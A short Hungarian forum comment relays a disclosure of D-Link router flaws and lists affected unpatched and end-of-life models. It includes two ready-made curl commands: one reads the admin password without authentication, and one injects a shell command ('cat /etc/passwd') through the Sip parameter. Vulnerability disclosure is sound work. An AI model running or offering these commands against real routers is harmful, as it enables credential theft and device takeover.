( toMpEr | 2018. 10. 19., p – 21:14 )

D-Link-re is jött egy adag sebezhetőség: http://sploit.tech/2018/10/12/D-Link.html

TLDR:
- curl http://routerip/uir//tmp/XXX/0 -al authentikáció nélkül kiolvasható a router admin jelszava plaintext-ben
- Majd bejelentkezés után curl http://routerip/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd -al tetszőleges parancs futtatható

Májusban jelentve lett a gyártónak, az megígérte a javítást a legújabb típusokra (DWR-116 and 111), de még nem történt meg.

További érintett EOL típusok, amik már így maradnak: DWRDWR-140, DWR-512, DWR-640, DWR-712, DWR-912, DWR-921. (+ valószínű még több)